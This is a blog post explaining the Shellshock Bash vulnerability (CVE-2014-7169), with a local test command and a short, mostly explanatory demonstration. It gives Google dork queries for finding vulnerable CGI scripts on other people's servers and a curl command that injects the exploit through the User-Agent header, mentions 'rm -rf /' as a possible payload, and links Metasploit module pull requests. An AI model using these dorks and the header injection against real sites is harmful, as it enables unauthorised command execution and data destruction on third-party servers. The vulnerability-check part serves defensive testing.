Home » Home » Explanation Of Shellshock Or BashBug With Demonstration

Hi,The Vulnerability CVE-2014-7169, Shellshock is a threatening security flaw which is just discovered in *nix Bash, As we know Bash powers almost all the Linux and Unix operating system even mac. If you are reading this blog right now it empowers bash at the background. This vulnerability is much more hard ass than Heartbleed, it allows to execute strings or arbitrary command on a remote system.

On severity perspective it goes beyond what you are thinking and its much simpler to perform the attack. The natural behaviour or Bash which allows to exporting shell variables and shell functions to other bash instances. This is accomplished through the process environment to a child process.

Proof of Concept:

The vulnerability happens because bash does stops after processing the function, it continues to parse and execute shell commands following the function.  For an instant, an environment variable

USR=() { ignored; }; /bin/ls

This will execute /bin/ls when the environment is imported into the bash process. The bellow command will help you to check whether your system is vulnerable or not

env x='() { ;;}; echo vulnerable’ bash -c “echo Im vulnerable”

Running the above command in Linux Terminal prints “vulnerable” and “Im vulnerable”. The environment command ‘env’ is used to either print a list of environment variables or run another utility in an changed environment without having to modify the currently existing environment. The “Bash” that executes the ‘echo Im vulnerable’ command – and the environment variable ‘x’ is imported into the ‘bash’ process.

Real World Example:

Use any of these Google Dorks to find the vulnerable index.cgi file

allinurl:”server-status” ,  intitle:apache “cgi-bin” , sitemap.xml filetype:xml intext:”cgi-bin” , filetype:sh inurl:cgi-bin

Once you located a perfect cgi file for an attack, launch the bellow command with  “example.com/cgi-bin/test” to the one you found.

curl -i -X HEAD  “http://example.com/cgi-mod/index.cgi” -A “User-Agent: () { :;}; /bin/ls”

Here, the curl is sending request to the example website with the User-Agent containing the exploit code (Example:”rm -rf /“). If you see behind the fact CGI basically stores the HTTP headers in environment variables. Let’s say the example.com is running a CGI application written in Bash script. It could be possible to modify the HTTP headers such that it will exploit the shellshock vulnerability in the target server and executes our code.

Attack Vector:

For those who run web applications this could be a vulnerable scenario, bash scripts which executed through cgi-bin. The CGI specification requires the web server to convert HTTP request headers supplied by the client to environment variables. A crafted web request targeting a vulnerable CGI application could launch code on the server. Same attacks are possible via OpenSSH allows secure shell sessions to bypass controls and execute code on the server.

There are already 4 Metasploit modules are on track.

https://github.com/rapid7/metasploit-framework/pull/3880/files

https://github.com/rapid7/metasploit-framework/pull/3882/

https://github.com/rapid7/metasploit-framework/pull/3883/files

https://github.com/rapid7/metasploit-framework/pull/3884/files#r18015621

The worst part of this vulnerability is it exist more than 15 years undiscovered. In next post I will cover how to patch this vulnerability.

If you feel I missed any information, feel free to comment here, I will add it to the article.

One thought on “Explanation Of Shellshock Or BashBug With Demonstration

  1. When visiting blogs, i usually discover a very good content like yours

Leave a Reply

Your email address will not be published. Required fields are marked *

CAPTCHA Image

*